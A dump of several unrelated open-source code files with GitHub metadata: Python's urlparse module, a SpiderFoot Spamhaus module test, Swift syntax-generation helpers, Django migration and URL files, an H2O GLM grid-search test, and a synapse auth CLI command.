            v = SplitResult(scheme, netloc, url, query, fragment)
            _parse_cache[key] = v
            return v
        # Accept the prefix as a scheme only if every character is legal;
        # the loop's else-clause runs only when no break occurred.
        for c in url[:i]:
            if c not in scheme_chars:
                break
        else:
            scheme, url = url[:i].lower(), url[i+1:]
    # Generic path: split components only for schemes known to use them.
    if scheme in uses_netloc and url[:2] == '//':
        netloc, url = _splitnetloc(url, 2)
    if allow_fragments and scheme in uses_fragment and '#' in url:
        url, fragment = url.split('#', 1)
    if scheme in uses_query and '?' in url:
        url, query = url.split('?', 1)
    v = SplitResult(scheme, netloc, url, query, fragment)
    _parse_cache[key] = v
    return v
def urlunparse(data):
    """Put a parsed URL back together again.  This may result in a
    slightly different, but equivalent URL, if the URL that was parsed
    originally had redundant delimiters, e.g. a ? with an empty query
    (the draft states that these are equivalent)."""
    scheme, netloc, path, params, query, fragment = data
    if params:
        # Re-attach the parameters to the last path segment.
        path = ';'.join((path, params))
    return urlunsplit((scheme, netloc, path, query, fragment))
def urlunsplit(data):
    """Combine the 5-tuple produced by urlsplit() back into a URL string."""
    scheme, netloc, path, query, fragment = data
    if netloc or (scheme and scheme in uses_netloc and path[:2] != '//'):
        # Emit a '//netloc' section; the path must then be rooted.
        if path and not path.startswith('/'):
            path = '/' + path
        path = '//' + (netloc or '') + path
    if scheme:
        path = scheme + ':' + path
    if query:
        path += '?' + query
    if fragment:
        path += '#' + fragment
    return path
def urljoin(base, url, allow_fragments=True):
    """Join a base URL and a possibly relative URL to form an absolute
    interpretation of the latter."""
    # Degenerate cases: one side empty means the other wins outright.
    if not base:
        return url
    if not url:
        return base
    bscheme, bnetloc, bpath, bparams, bquery, bfragment = \
        urlparse(base, '', allow_fragments)
    # Parse the target with the base's scheme as default.
    scheme, netloc, path, params, query, fragment = \
        urlparse(url, bscheme, allow_fragments)
    if scheme != bscheme or scheme not in uses_relative:
        # Different scheme (or one that can't be relative): url is absolute.
        return url
    if scheme in uses_netloc:
        if netloc:
            # url has its own authority: it's absolute apart from scheme.
            return urlunparse((scheme, netloc, path,
                               params, query, fragment))
        netloc = bnetloc
    if path[:1] == '/':
        # Absolute path: keep everything from url except the authority.
        return urlunparse((scheme, netloc, path,
                           params, query, fragment))
    if not path:
        # Empty path: inherit the base's path, and possibly params/query.
        path = bpath
        if not params:
            params = bparams
        else:
            # url supplied params of its own; drop the inherited path's
            # trailing character (the ';' separator position).
            path = path[:-1]
            return urlunparse((scheme, netloc, path,
                               params, query, fragment))
        if not query:
            query = bquery
        return urlunparse((scheme, netloc, path,
                           params, query, fragment))
    # Relative path: merge with the base's directory and resolve '.'/'..'.
    segments = bpath.split('/')[:-1] + path.split('/')
    # XXX The stuff below is bogus in various ways...
    if segments[-1] == '.':
        segments[-1] = ''
    while '.' in segments:
        segments.remove('.')
    # Repeatedly collapse the leftmost 'segment/..' pair (never the root).
    while 1:
        i = 1
        n = len(segments) - 1
        while i < n:
            if (segments[i] == '..'
                and segments[i-1] not in ('', '..')):
                del segments[i-1:i+1]
                break
            i = i+1
        else:
            break
    # Normalize a trailing '..' into a trailing slash.
    if segments == ['', '..']:
        segments[-1] = ''
    elif len(segments) >= 2 and segments[-1] == '..':
        segments[-2:] = ['']
    return urlunparse((scheme, netloc, '/'.join(segments),
                       params, query, fragment))
def urldefrag(url):
    """Removes any existing fragment from URL.

    Returns a tuple of the defragmented URL and the fragment.  If
    the URL contained no fragments, the second element is the
    empty string.
    """
    if '#' not in url:
        return url, ''
    scheme, netloc, path, params, query, fragment = urlparse(url)
    defragmented = urlunparse((scheme, netloc, path, params, query, ''))
    return defragmented, fragment
# unquote method for parse_qs and parse_qsl
# Cannot use directly from urllib as it would create circular reference.
# urllib uses urlparse methods ( urljoin)

# Precomputed '%xx' -> character tables covering both hex-digit cases.
_hextochr = dict(('%02x' % i, chr(i)) for i in range(256))
_hextochr.update(('%02X' % i, chr(i)) for i in range(256))


def unquote(s):
    """unquote('abc%20def') -> 'abc def'."""
    # NOTE: Python 2 only -- relies on the xrange() and unichr() builtins.
    res = s.split('%')
    for i in xrange(1, len(res)):
        item = res[i]
        try:
            # Fast path: table lookup for a valid two-hex-digit escape.
            res[i] = _hextochr[item[:2]] + item[2:]
        except KeyError:
            # Malformed escape: leave the literal '%' in place.
            res[i] = '%' + item
        except UnicodeDecodeError:
            # Mixed-case table lookup failed on a unicode string; decode
            # the escape manually via unichr().
            res[i] = unichr(int(item[:2], 16)) + item[2:]
    return "".join(res)
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
    """Parse a query given as a string argument.

    Arguments:

    qs: URL-encoded query string to be parsed

    keep_blank_values: flag indicating whether blank values in
        URL encoded queries should be treated as blank strings.
        A true value indicates that blanks should be retained as
        blank strings.  The default false value indicates that
        blank values are to be ignored and treated as if they were
        not included.

    strict_parsing: flag indicating what to do with parsing errors.
        If false (the default), errors are silently ignored.
        If true, errors raise a ValueError exception.

    Returns a dict mapping each name to a list of its values.
    """
    # Renamed the accumulator (previously 'dict', shadowing the builtin).
    result = {}
    for name, value in parse_qsl(qs, keep_blank_values, strict_parsing):
        if name in result:
            result[name].append(value)
        else:
            result[name] = [value]
    return result
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
    """Parse a query given as a string argument.

    Arguments:

    qs: URL-encoded query string to be parsed

    keep_blank_values: flag indicating whether blank values in
        URL encoded queries should be treated as blank strings.  A
        true value indicates that blanks should be retained as blank
        strings.  The default false value indicates that blank values
        are to be ignored and treated as if they were not included.

    strict_parsing: flag indicating what to do with parsing errors. If
        false (the default), errors are silently ignored. If true,
        errors raise a ValueError exception.

    Returns a list of (name, value) pairs.
    """
    # Pairs may be separated by either '&' or ';'.
    pairs = [s2 for s1 in qs.split('&') for s2 in s1.split(';')]
    r = []
    for name_value in pairs:
        if not name_value and not strict_parsing:
            continue
        nv = name_value.split('=', 1)
        if len(nv) != 2:
            if strict_parsing:
                # Fix: call-form raise, valid in both Python 2 and 3
                # (the old "raise ValueError, msg" form is Python-2-only
                # syntax and breaks compilation under Python 3).
                raise ValueError("bad query field: %r" % (name_value,))
            # Handle case of a control-name with no equal sign
            if keep_blank_values:
                nv.append('')
            else:
                continue
        if len(nv[1]) or keep_blank_values:
            name = unquote(nv[0].replace('+', ' '))
            value = unquote(nv[1].replace('+', ' '))
            r.append((name, value))
    return r
test_input = """
http://a/b/c/d
g:h = <URL:g:h>
http:g = <URL:http://a/b/c/g>
http: = <URL:http://a/b/c/d>
g = <URL:http://a/b/c/g>
./g = <URL:http://a/b/c/g>
g/ = <URL:http://a/b/c/g/>
/g = <URL:http://a/g>
//g = <URL:http://g>
?y = <URL:http://a/b/c/d?y>
g?y = <URL:http://a/b/c/g?y>
g?y/./x = <URL:http://a/b/c/g?y/./x>
. = <URL:http://a/b/c/>
./ = <URL:http://a/b/c/>
.. = <URL:http://a/b/>
../ = <URL:http://a/b/>
../g = <URL:http://a/b/g>
../.. = <URL:http://a/>
../../g = <URL:http://a/g>
../../../g = <URL:http://a/../g>
./../g = <URL:http://a/b/g>
./g/. = <URL:http://a/b/c/g/>
/./g = <URL:http://a/./g>
g/./h = <URL:http://a/b/c/g/h>
g/../h = <URL:http://a/b/c/h>
http:g = <URL:http://a/b/c/g>
http: = <URL:http://a/b/c/d>
http:?y = <URL:http://a/b/c/d?y>
http:g?y = <URL:http://a/b/c/g?y>
http:g?y/./x = <URL:http://a/b/c/g?y/./x>
"""
def test():
    """Self-test driver: parse/join each test_input case (or a file given
    on the command line) and flag mismatches.

    NOTE: Python 2 only -- uses print statements and cStringIO/StringIO.
    """
    import sys
    base = ''
    if sys.argv[1:]:
        # Read test cases from the named file ('-' means stdin).
        fn = sys.argv[1]
        if fn == '-':
            fp = sys.stdin
        else:
            fp = open(fn)
    else:
        try:
            from cStringIO import StringIO
        except ImportError:
            from StringIO import StringIO
        fp = StringIO(test_input)
    for line in fp:
        words = line.split()
        if not words:
            continue
        url = words[0]
        parts = urlparse(url)
        print '%-10s : %s' % (url, parts)
        abs = urljoin(base, url)
        if not base:
            # The first URL seen becomes the base for the remaining joins.
            base = abs
        wrapped = '<URL:%s>' % abs
        print '%-10s = %s' % (url, wrapped)
        if len(words) == 3 and words[1] == '=':
            if wrapped != words[2]:
                print 'EXPECTED', words[2], '!!!!!!!!!!'

if __name__ == '__main__':
    test()
| {
"content_hash": "e7e66e5c69ed41a105cc506d5b7c25f5",
"timestamp": "",
"source": "github",
"line_count": 423,
"max_line_length": 102,
"avg_line_length": 35.13002364066194,
"alnum_prop": 0.5116419919246299,
"repo_name": "chvrga/outdoor-explorer",
"id": "2c982d5a6a66a1e9278ab5aaad7dec09798ad317",
"size": "14860",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "java/play-1.4.4/python/Lib/urlparse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4720"
},
{
"name": "C",
"bytes": "76128"
},
{
"name": "C++",
"bytes": "31284"
},
{
"name": "CSS",
"bytes": "107401"
},
{
"name": "HTML",
"bytes": "1754737"
},
{
"name": "Java",
"bytes": "2441299"
},
{
"name": "JavaScript",
"bytes": "1405163"
},
{
"name": "PLpgSQL",
"bytes": "1377"
},
{
"name": "Python",
"bytes": "8991412"
},
{
"name": "Ruby",
"bytes": "295601"
},
{
"name": "Shell",
"bytes": "7499"
},
{
"name": "XQuery",
"bytes": "544017"
},
{
"name": "XSLT",
"bytes": "1099"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_spamhaus import sfp_spamhaus
from sflib import SpiderFoot
@pytest.mark.usefixtures
class TestModuleSpamhaus(unittest.TestCase):
    """Smoke tests for the sfp_spamhaus SpiderFoot module."""
    # NOTE(review): a bare @pytest.mark.usefixtures (no fixture-name
    # arguments) applies no fixtures -- and test_setup reads
    # self.default_options, which nothing visible here defines.
    # Presumably a conftest.py injects it; confirm against the suite.

    def test_opts(self):
        # Every option must have a matching description entry.
        module = sfp_spamhaus()
        self.assertEqual(len(module.opts), len(module.optdescs))

    def test_setup(self):
        sf = SpiderFoot(self.default_options)
        module = sfp_spamhaus()
        module.setup(sf, dict())

    def test_watchedEvents_should_return_list(self):
        module = sfp_spamhaus()
        self.assertIsInstance(module.watchedEvents(), list)

    def test_producedEvents_should_return_list(self):
        module = sfp_spamhaus()
        self.assertIsInstance(module.producedEvents(), list)
| {
"content_hash": "4a157b02117cd1603967da024fd15fe4",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 28.192307692307693,
"alnum_prop": 0.694406548431105,
"repo_name": "smicallef/spiderfoot",
"id": "9d551be9b0dfa524c208ae060e0a2cd95d572c27",
"size": "733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/modules/test_sfp_spamhaus.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
import textwrap
from AttributeNodes import ATTRIBUTE_NODES
from AvailabilityNodes import AVAILABILITY_NODES
from CommonNodes import COMMON_NODES # noqa: I201
from DeclNodes import DECL_NODES # noqa: I201
from ExprNodes import EXPR_NODES # noqa: I201
from GenericNodes import GENERIC_NODES # noqa: I201
from PatternNodes import PATTERN_NODES # noqa: I201
from StmtNodes import STMT_NODES # noqa: I201
import Token
from TypeNodes import TYPE_NODES # noqa: I201
# Re-export global constants
# All syntax node definitions, concatenated in the order they are emitted.
SYNTAX_NODES = COMMON_NODES + EXPR_NODES + DECL_NODES + ATTRIBUTE_NODES + \
    STMT_NODES + GENERIC_NODES + TYPE_NODES + PATTERN_NODES + \
    AVAILABILITY_NODES
# Token definitions re-exported from the Token module for convenience.
SYNTAX_TOKENS = Token.SYNTAX_TOKENS
SYNTAX_TOKEN_MAP = Token.SYNTAX_TOKEN_MAP
def make_missing_child(child):
    """
    Generates a C++ call to make the raw syntax for a given Child object.
    """
    if child.is_token():
        token = child.main_token()
        if token:
            kind, text = token.kind, token.text
        else:
            kind, text = "unknown", ""
        return 'RawSyntax::missing(tok::%s, "%s")' % (kind, text)
    # Layout node: map the generic 'Syntax' kind to 'Unknown'.
    kind = "Unknown" if child.syntax_kind == "Syntax" else child.syntax_kind
    if child.node_choices:
        # Delegate to the first allowed node choice.
        return make_missing_child(child.node_choices[0])
    return 'RawSyntax::missing(SyntaxKind::%s)' % kind
def check_child_condition_raw(child):
    """
    Generates a C++ closure to check whether a given raw syntax node can
    satisfy the requirements of child.
    """
    result = '[](const RC<RawSyntax> &Raw) {\n'
    result += ' // check %s\n' % child.name
    if child.token_choices:
        # The child must be one of a fixed set of token kinds.
        result += 'if (!Raw->isToken()) return false;\n'
        result += 'auto TokKind = Raw->getTokenKind();\n'
        tok_checks = []
        for choice in child.token_choices:
            tok_checks.append("TokKind == tok::%s" % choice.kind)
        result += 'return %s;\n' % (' || '.join(tok_checks))
    elif child.text_choices:
        # The child must be a token whose text is one of a fixed set.
        result += 'if (!Raw->isToken()) return false;\n'
        result += 'auto Text = Raw->getTokenText();\n'
        tok_checks = []
        for choice in child.text_choices:
            tok_checks.append('Text == "%s"' % choice)
        result += 'return %s;\n' % (' || '.join(tok_checks))
    elif child.node_choices:
        # Any one of the allowed node kinds may satisfy this child.
        node_checks = []
        for choice in child.node_choices:
            node_checks.append(check_child_condition_raw(choice) + '(Raw)')
        result += 'return %s;\n' % ((' || ').join(node_checks))
    else:
        # Fall back to the child's own type check.
        result += 'return %s::kindof(Raw->getKind());' % child.type_name
    result += '}'
    return result
def make_missing_swift_child(child):
    """
    Generates a Swift call to make the raw syntax for a given Child object.
    """
    if child.is_token():
        token = child.main_token()
        if token:
            kind = token.swift_kind()
        else:
            kind = "unknown"
        # Tokens without fixed text take an explicit empty-text argument.
        if not token or not token.text:
            kind += '("")'
        return 'RawSyntax.missingToken(.%s)' % kind
    # Layout node: the generic 'Syntax' kind becomes 'unknown'.
    if child.syntax_kind == "Syntax":
        kind = "unknown"
    else:
        kind = child.swift_syntax_kind
    return 'RawSyntax.missing(.%s)' % kind
def create_node_map():
    """
    Creates a lookup table to find nodes by their kind.
    """
    node_map = {}
    for node in SYNTAX_NODES:
        node_map[node.syntax_kind] = node
    return node_map
def is_visitable(node):
    """A node is visitable by syntax visitors unless it is a base kind."""
    if node.is_base():
        return False
    return True
def dedented_lines(description):
    """
    Each line of the provided string with leading whitespace stripped.
    """
    if not description:
        return []
    dedented = textwrap.dedent(description)
    return dedented.split('\n')
| {
"content_hash": "109c1b61f2c1482eec05830586e84af4",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 75,
"avg_line_length": 35.08653846153846,
"alnum_prop": 0.6207180049328583,
"repo_name": "huonw/swift",
"id": "9aba6ef6642f9a39641ddcca161de7db30e09b55",
"size": "3649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/gyb_syntax_support/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "34"
},
{
"name": "C",
"bytes": "200369"
},
{
"name": "C++",
"bytes": "29277385"
},
{
"name": "CMake",
"bytes": "462532"
},
{
"name": "D",
"bytes": "1107"
},
{
"name": "DTrace",
"bytes": "2438"
},
{
"name": "Emacs Lisp",
"bytes": "57358"
},
{
"name": "LLVM",
"bytes": "67650"
},
{
"name": "Makefile",
"bytes": "1841"
},
{
"name": "Objective-C",
"bytes": "369708"
},
{
"name": "Objective-C++",
"bytes": "232830"
},
{
"name": "Perl",
"bytes": "2211"
},
{
"name": "Python",
"bytes": "1180644"
},
{
"name": "Ruby",
"bytes": "2091"
},
{
"name": "Shell",
"bytes": "206022"
},
{
"name": "Swift",
"bytes": "24216920"
},
{
"name": "Vim script",
"bytes": "15654"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import image_cropping.fields
class Migration(migrations.Migration):
    """Adds a Language model, links Market/PublishedMarket to it, and
    refreshes the Logo image/cropping field definitions."""
    # NOTE(review): the backslash-continued help_text strings below are
    # reproduced exactly as found; the continuation line's leading column
    # is part of the string value.

    dependencies = [
        ('markets', '0061_auto_20170510_0748'),
    ]

    operations = [
        migrations.CreateModel(
            name='Language',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200, unique=True)),
            ],
            options={
                'ordering': ('name',),
            },
        ),
        migrations.AlterField(
            model_name='logo',
            name='cropping',
            field=image_cropping.fields.ImageRatioField(
                'image', '400x302', adapt_rotation=False, allow_fullsize=False,
                hide_image_field=False, size_warning=False, verbose_name='cropping',
                free_crop=False, help_text='Use cropping tool to cut the image to the right format. Always leave\
enough white space around the edges and try to keep the largest possible size for good image quality.',
            ),
        ),
        migrations.AlterField(
            model_name='logo',
            name='image',
            field=models.ImageField(
                null=True, upload_to='',
                help_text="After choosing an image to upload click 'Save' to access the 'Cropping' tool and edit the\
image"),
        ),
        migrations.AddField(
            model_name='market',
            name='language',
            field=models.ForeignKey(
                blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                to='markets.Language', verbose_name='Language of Marketplace'),
        ),
        migrations.AddField(
            model_name='publishedmarket',
            name='language',
            field=models.ForeignKey(
                blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                to='markets.Language', verbose_name='Language of Marketplace'),
        ),
    ]
| {
"content_hash": "5c3390d52233eeab66a6216e5bb5dd89",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 119,
"avg_line_length": 38.01754385964912,
"alnum_prop": 0.5657591139824643,
"repo_name": "uktrade/navigator",
"id": "1a14036622950d49fe07d42152d3df9214e13b5a",
"size": "2240",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "app/markets/migrations/0062_auto_20170726_1512.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "143"
},
{
"name": "HTML",
"bytes": "55604"
},
{
"name": "JavaScript",
"bytes": "53405"
},
{
"name": "Makefile",
"bytes": "4355"
},
{
"name": "Procfile",
"bytes": "181"
},
{
"name": "Python",
"bytes": "243097"
},
{
"name": "SCSS",
"bytes": "125647"
},
{
"name": "Shell",
"bytes": "5758"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
# Register each installed app's ModelAdmin classes with the admin site.
admin.autodiscover()

# Pre-Django-1.8 URLconf style: only the admin site is routed.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'gnucash_explorer.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "419ab5a5a4121a6d03726afb03557278",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 61,
"avg_line_length": 25.583333333333332,
"alnum_prop": 0.6579804560260586,
"repo_name": "peap/gnucash_explorer",
"id": "48882ee073a3b098ed0a6218bd4137c9ba43bb3e",
"size": "307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gnucash_explorer/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4589"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from builtins import range
import sys
sys.path.insert(1,"../../../")
import h2o
from h2o.grid.grid_search import H2OGridSearch
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from tests import pyunit_utils
def benign_grid():
    """Integration test for H2OGridSearch over GLM on the benign dataset.

    Exercises three things against a live H2O cluster:
      1. a Cartesian grid that includes an invalid hyperparameter value
         (``'a'`` for ``alpha``), verifying bad-value handling,
      2. ``RandomDiscrete`` search with a ``max_models`` cap,
      3. ``RandomDiscrete`` search with asymptotic (metric-based) stopping.
    Assertions raise AssertionError on failure, failing the pyunit.
    """
    training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
    Y = 3
    X = [4,5,6,7,8,9,10,11]

    # NOTE: this tests bad parameter value handling; 'a' is not a float:
    hyper_parameters = {'alpha': [0.01,0.3,0.5,'a'], 'lambda': [1e-5,1e-6,1e-7,1e-8]}
    gs = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters)
    gs.train(x=X,y=Y, training_frame=training_data)
    # Every model produced by the grid must be a GLM.
    for model in gs:
        assert isinstance(model, H2OGeneralizedLinearEstimator)
    gs.show()
    print(gs.get_grid(sort_by='F1', decreasing=True))
    # Pick the best model by F1 and make sure it is usable for prediction.
    best_model_id = gs.get_grid(sort_by='F1', decreasing=True).model_ids[0]
    best_model = h2o.get_model(best_model_id)
    best_model.predict(training_data)
    gs.predict(training_data)
    print(gs.get_hyperparams(best_model_id))
    print(gs.grid_id)
    assert best_model.params['family']['actual'] == 'binomial'

    # test search_criteria plumbing and max_models
    search_criteria = { 'strategy': "RandomDiscrete", 'max_models': 3 }
    max_models_g = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters, search_criteria=search_criteria)
    max_models_g.train(x=X,y=Y, training_frame=training_data)
    max_models_g.show()
    print(max_models_g.grid_id)
    print(max_models_g.get_grid(sort_by='F1', decreasing=True))
    assert len(max_models_g.models) == 3, "expected 3 models, got: {}".format(len(max_models_g.models))
    print(max_models_g.sorted_metric_table())

    # test search_criteria plumbing and asymptotic stopping
    search_criteria = { 'strategy': "RandomDiscrete", 'seed': 42, 'stopping_metric': "AUTO", 'stopping_tolerance': 0.1, 'stopping_rounds': 2 }
    asymp_g = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial', nfolds=5), hyper_parameters, search_criteria=search_criteria)
    asymp_g.train(x=X,y=Y, training_frame=training_data)
    asymp_g.show()
    print(asymp_g.grid_id)
    print(asymp_g.get_grid(sort_by='F1', decreasing=True))
    # With seed=42 and this stopping config the search settles on 5 models.
    assert len(asymp_g.models) == 5, "expected 5 models, got: {}".format(len(asymp_g.models))
# Standard h2o pyunit entry point: when executed directly, standalone_test
# handles cluster connection/teardown; when imported by the test runner the
# connection already exists, so the test is called inline.
if __name__ == "__main__":
    pyunit_utils.standalone_test(benign_grid)
else:
    benign_grid()
| {
"content_hash": "b802ebbda953e56c9d00e92661a5294a",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 140,
"avg_line_length": 39.95,
"alnum_prop": 0.7175636211931581,
"repo_name": "h2oai/h2o-3",
"id": "5fd14d0f83e650ee8c6a96a5e879b6d5275567be",
"size": "2397",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_algos/glm/pyunit_benign_glm_grid.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "12803"
},
{
"name": "CSS",
"bytes": "882321"
},
{
"name": "CoffeeScript",
"bytes": "7550"
},
{
"name": "DIGITAL Command Language",
"bytes": "106"
},
{
"name": "Dockerfile",
"bytes": "10459"
},
{
"name": "Emacs Lisp",
"bytes": "2226"
},
{
"name": "Groovy",
"bytes": "205646"
},
{
"name": "HCL",
"bytes": "36232"
},
{
"name": "HTML",
"bytes": "8018117"
},
{
"name": "HiveQL",
"bytes": "3985"
},
{
"name": "Java",
"bytes": "15981357"
},
{
"name": "JavaScript",
"bytes": "148426"
},
{
"name": "Jupyter Notebook",
"bytes": "20638329"
},
{
"name": "Makefile",
"bytes": "46043"
},
{
"name": "PHP",
"bytes": "800"
},
{
"name": "Python",
"bytes": "8188608"
},
{
"name": "R",
"bytes": "4149977"
},
{
"name": "Ruby",
"bytes": "64"
},
{
"name": "Sass",
"bytes": "23790"
},
{
"name": "Scala",
"bytes": "4845"
},
{
"name": "Shell",
"bytes": "214495"
},
{
"name": "Smarty",
"bytes": "1792"
},
{
"name": "TeX",
"bytes": "554940"
}
],
"symlink_target": ""
} |
import json
import pprint
import shutil
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.cores.common as s_cores_commmon
import synapse.lib.cli as s_cli
import synapse.lib.auth as s_auth
import synapse.lib.tufo as s_tufo
class AuthCmd(s_cli.Cmd):
    '''
    Helper for managing AuthMixin instances.

    Examples:

        # Get users
        auth

        # Get roles
        auth --type role

        # Get a specific user
        auth --name root@localhost

        # Make a user
        auth --act add --name user@localhost

        # Add a rule to a user
        auth --act add --name user@localhost --rule node:tag:add --tag *

        # Make a role
        auth --act add --name creators --type role

        # Add a rule to a role
        auth --act add --name creators --type role --rule node:add --form strform

        # Get a specific role details
        auth --type role --name creators

        # Grant a user a role
        auth --act add --name user@localhost --role creators

        # Grant a user admin
        auth --act add --name user@localhost --admin

        # Remove admin from a user
        auth --act del --name user@localhost --admin

        # Remove a role from a user
        auth --act del --name user@localhost --role creators

        # Remove a rule from a role
        auth --act del --name creators --type role --rule node:add --form strform

        # Remove a rule from a user
        auth --act del --name user@localhost --rule node:tag:add --tag *

        # Delete a role
        auth --act del --name creators --type role

        # Delete a user
        auth --act del --name user@localhost
    '''
    _cmd_name = 'auth'

    # Option syntax consumed by s_cli.Cmd's parser.  --act defaults to 'get'
    # and --type to 'user', so a bare "auth" lists users.
    _cmd_syntax = (
        ('--act', {'type': 'enum',
                   'defval': 'get',
                   'enum:vals': ('add', 'del', 'get')}),
        ('--type', {'type': 'enum',
                    'defval': 'user',
                    'enum:vals': ('user', 'role')}),
        ('--name', {'type': 'valu'}),
        ('--rule', {'type': 'valu'}),
        ('--form', {'type': 'valu'}),
        ('--prop', {'type': 'valu'}),
        ('--tag', {'type': 'valu'}),
        ('--role', {'type': 'valu'}),
        ('--admin', {}),
        ('--json', {})
    )

    # --type value -> plural noun used in bulk "auth:get:*" messages.
    getmap = {'user': 'users',
              'role': 'roles'}
    # --type value -> keyword used when requesting a single user/role.
    typmap = {'user': 'user',
              'role': 'role'}
    # --type value -> message suffix used when modifying rules.
    modmap = {'user': 'urule',
              'role': 'rrule'}

    def __init__(self, cli, **opts):
        s_cli.Cmd.__init__(self, cli, **opts)
        # Append the raw option-syntax tuples to the docstring so that the
        # CLI's "help auth" output documents every accepted option.
        s = '\n '.join([str(stx) for stx in self._cmd_syntax])
        self.__doc__ = '\n '.join([self.__doc__, 'Command Syntax:\n', s])

    def formRulefo(self, opts):
        # Build a rule tufo from the --rule/--form/--prop/--tag options, or
        # return None when no --rule was supplied at all.
        rtype = opts.pop('rule', None)
        if not rtype:
            return None
        form = opts.get('form')
        prop = opts.get('prop')
        tag = opts.get('tag')
        if tag:
            # A tag-based rule cannot also carry form/prop qualifiers.
            if form or prop:
                raise s_exc.BadSyntaxError(mesg='Cannot form rulefo with tag and (form OR prop)')
            else:
                return s_tufo.tufo(rtype, tag=tag)
        if form and prop:
            return s_tufo.tufo(rtype, form=form, prop=prop)
        if form and not prop:
            return s_tufo.tufo(rtype, form=form)
        # Reaching here means --prop without --form (or nothing usable).
        raise s_exc.BadSyntaxError(mesg='Unable to form rulefo',
                                   prop=prop, form=form, tag=tag, rule=rtype)

    def getMsg(self, stub, name, typ, opts):
        # Construct the (evtname, info) message tuple for an add/del action.
        # ``stub`` is 'auth:add' or 'auth:del'; precedence is
        # --admin, then --role, then a rule (or the bare object).
        if not name:
            raise s_exc.BadSyntaxError(mesg='Action requires a name')
        args = {typ: name}
        admin = opts.pop('admin', None)
        if admin and typ == 'user':
            msg = s_tufo.tufo(':'.join([stub, 'admin']),
                              **args)
            return msg
        role = opts.pop('role', None)
        if role and typ == 'user':
            args['role'] = role
            msg = s_tufo.tufo(':'.join([stub, 'urole']),
                              **args)
            return msg
        rulefo = self.formRulefo(opts)
        if rulefo is None:
            # No rule content: act on the user/role object itself.
            msg = s_tufo.tufo(':'.join([stub, typ]),
                              **args)
            return msg
        mod = self.modmap.get(typ)
        if not mod:  # pragma: no cover
            raise s_exc.BadSyntaxError(mesg='Unknown type encountered',
                                       type=typ)
        args['rule'] = rulefo
        msg = s_tufo.tufo(':'.join([stub, mod]),
                          **args)
        return msg

    def runCmdOpts(self, opts):
        core = self.getCmdItem()  # type: s_auth.AuthMixin
        act = opts.pop('act')
        typ = opts.pop('type')
        name = opts.pop('name', None)
        astub = 'auth:add'
        dstub = 'auth:del'
        # Form our mesg
        if act == 'get':
            if name:
                mesg = s_tufo.tufo('auth:req:%s' % typ,
                                   **{self.typmap.get(typ): name})
            else:
                mesg = ('auth:get:%s' % self.getmap.get(typ),
                        {})
        elif act == 'add':
            mesg = self.getMsg(astub, name, typ, opts)
        elif act == 'del':
            mesg = self.getMsg(dstub, name, typ, opts)
        else:  # pragma: no cover
            raise s_exc.BadSyntaxError(mesg='Unknown action provided',
                                       act=act)
        # Execute remote call
        isok, retn = core.authReact(mesg)
        # reqok raises on a failed remote call, otherwise unwraps the result.
        retn = s_common.reqok(isok, retn)
        # Format output
        if opts.get('json'):
            outp = json.dumps(retn, indent=2, sort_keys=True)
        else:
            width, _ = shutil.get_terminal_size((120, 24))
            if width == 0:
                # In CI we may not have a tty available.
                width = 120
            outp = pprint.pformat(retn, width=width)
        self.printf(outp)
        return retn
| {
"content_hash": "ca73f7d16ae01c7b2fbf16131bb3b7e9",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 97,
"avg_line_length": 34.851190476190474,
"alnum_prop": 0.4883005977796755,
"repo_name": "vivisect/synapse",
"id": "d64d0b849d0d859b3766ee343c3bb834ba629390",
"size": "5855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synapse/cmds/auth.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "716598"
}
],
"symlink_target": ""
} |
"""Accesses the google.monitoring.v3 UptimeCheckService API."""
import functools
